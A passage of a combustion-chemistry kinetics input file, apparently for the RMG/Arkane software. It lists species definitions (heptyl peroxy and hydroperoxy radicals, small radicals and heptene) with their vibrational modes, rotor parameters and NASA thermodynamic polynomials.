HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.307683,0.102087,-0.000101217,6.59004e-08,-1.9306e-11,2829.86,35.3038], Tmin=(100,'K'), Tmax=(797.655,'K')), NASAPolynomial(coeffs=[7.35057,0.0636835,-2.89977e-05,5.54111e-09,-3.88302e-13,1608.13,0.0884967], Tmin=(797.655,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(22.2936,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(C2CsJOOH)"""),
)
species(
label = 'C2H5(32)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.59,1642.33,1643.48,3621.68,3622.96],'cm^-1')),
HinderedRotor(inertia=(0.866827,'amu*angstrom^2'), symmetry=1, barrier=(19.9301,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = '[CH2]C(CCC)O[O](145)',
structure = SMILES('[CH2]C(CCC)O[O]'),
E0 = (96.9176,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,408.322,408.323],'cm^-1')),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.87169,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665328,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665326,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.132,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.761829,0.0732135,-6.43673e-05,3.2225e-08,-6.86802e-12,11771.4,29.3513], Tmin=(100,'K'), Tmax=(1094.49,'K')), NASAPolynomial(coeffs=[10.3082,0.0383245,-1.65516e-05,3.0998e-09,-2.1529e-13,9681.74,-17.5663], Tmin=(1094.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(96.9176,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CJCOOH)"""),
)
species(
label = 'CC[CH]C(CCC)O[O](146)',
structure = SMILES('CC[CH]C(CCC)O[O]'),
E0 = (35.8095,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.308665,0.100406,-8.84314e-05,4.61229e-08,-1.05358e-11,4457.31,38.0039], Tmin=(100,'K'), Tmax=(1010.26,'K')), NASAPolynomial(coeffs=[10.3052,0.0583815,-2.60341e-05,4.94683e-09,-3.46273e-13,2312.78,-13.3102], Tmin=(1010.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.8095,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH) + radical(ROOJ)"""),
)
species(
label = '[CH2]CC(CCC)O[O](147)',
structure = SMILES('[CH2]CC(CCC)O[O]'),
E0 = (64.4211,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (116.158,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.305339,0.0849559,-7.17251e-05,3.49657e-08,-7.40173e-12,7878,33.0286], Tmin=(100,'K'), Tmax=(1086.3,'K')), NASAPolynomial(coeffs=[10.2215,0.0484424,-2.13058e-05,4.02302e-09,-2.80588e-13,5723.63,-15.6317], Tmin=(1086.3,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(64.4211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH3(18)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'C[CH]CC(CCC)O[O](148)',
structure = SMILES('C[CH]CC(CCC)O[O]'),
E0 = (29.8408,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.222128,0.099523,-9.48843e-05,5.89934e-08,-1.65158e-11,3735.18,38.13], Tmin=(100,'K'), Tmax=(831.502,'K')), NASAPolynomial(coeffs=[7.49589,0.0623944,-2.79046e-05,5.29089e-09,-3.69296e-13,2451.69,2.31923], Tmin=(831.502,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(29.8408,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)O[O](149)',
structure = SMILES('[CH2]CCC(CCC)O[O]'),
E0 = (40.6409,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.31089,0.0993682,-8.4228e-05,4.1255e-08,-8.78157e-12,5039.37,37.4872], Tmin=(100,'K'), Tmax=(1080.2,'K')), NASAPolynomial(coeffs=[11.1942,0.0567646,-2.5067e-05,4.74259e-09,-3.31152e-13,2553.82,-18.9057], Tmin=(1080.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(40.6409,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH2(S)(24)',
structure = SMILES('[CH2]'),
E0 = (418.921,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'CCCC(CC)O[O](150)',
structure = SMILES('CCCC(CC)O[O]'),
E0 = (-140.825,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (117.166,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.21933,0.0849261,-6.42064e-05,2.69561e-08,-4.88243e-12,-16803,31.5405], Tmin=(100,'K'), Tmax=(1248.35,'K')), NASAPolynomial(coeffs=[11.4159,0.0490497,-2.10977e-05,3.93422e-09,-2.71954e-13,-19598.4,-24.9599], Tmin=(1248.35,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-140.825,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(482.239,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'CCC[C](CCC)OO(139)',
structure = SMILES('CCC[C](CCC)OO'),
E0 = (-129.711,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.331826,0.102878,-8.67857e-05,4.38793e-08,-9.97788e-12,-15451,34.63], Tmin=(100,'K'), Tmax=(996.253,'K')), NASAPolynomial(coeffs=[9.10012,0.0650087,-2.97678e-05,5.72457e-09,-4.0335e-13,-17330.4,-10.8383], Tmin=(996.253,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-129.711,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOOH)"""),
)
species(
label = 'CC[CH]C(CCC)OO(140)',
structure = SMILES('CC[CH]C(CCC)OO'),
E0 = (-116.195,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.541478,0.103807,-8.37226e-05,3.74479e-08,-7.20635e-12,-13815,38.067], Tmin=(100,'K'), Tmax=(1185.08,'K')), NASAPolynomial(coeffs=[12.9953,0.058117,-2.5892e-05,4.91572e-09,-3.43586e-13,-17023.5,-29.5387], Tmin=(1185.08,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-116.195,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH)"""),
)
species(
label = 'C[CH]CC(CCC)OO(141)',
structure = SMILES('C[CH]CC(CCC)OO'),
E0 = (-122.164,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.289445,0.100884,-8.27272e-05,4.0318e-08,-8.7966e-12,-14544,37.6068], Tmin=(100,'K'), Tmax=(1036.34,'K')), NASAPolynomial(coeffs=[9.41781,0.0634168,-2.84961e-05,5.43144e-09,-3.80742e-13,-16555.9,-9.57154], Tmin=(1036.34,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-122.164,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)OO(142)',
structure = SMILES('[CH2]CCC(CCC)OO'),
E0 = (-111.364,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.603592,0.103441,-8.16947e-05,3.51448e-08,-6.43845e-12,-13230.4,37.7671], Tmin=(100,'K'), Tmax=(1246.47,'K')), NASAPolynomial(coeffs=[14.1561,0.056077,-2.46975e-05,4.66063e-09,-3.24428e-13,-16909.9,-36.6921], Tmin=(1246.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.364,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ)"""),
)
species(
label = 'CCC=CCCC(122)',
structure = SMILES('CCC=CCCC'),
E0 = (-98.9731,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (98.1861,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.516528,0.0646821,-1.31158e-05,-1.94274e-08,9.49365e-12,-11768.3,29.5503], Tmin=(100,'K'), Tmax=(1093.68,'K')), NASAPolynomial(coeffs=[12.5234,0.0444655,-1.78892e-05,3.29347e-09,-2.28557e-13,-15811.9,-35.9302], Tmin=(1093.68,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-98.9731,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(486.397,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH)"""),
)
species(
label = 'HO2(10)',
structure = SMILES('[O]O'),
E0 = (2.67648,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1112.8,1388.53,3298.45],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
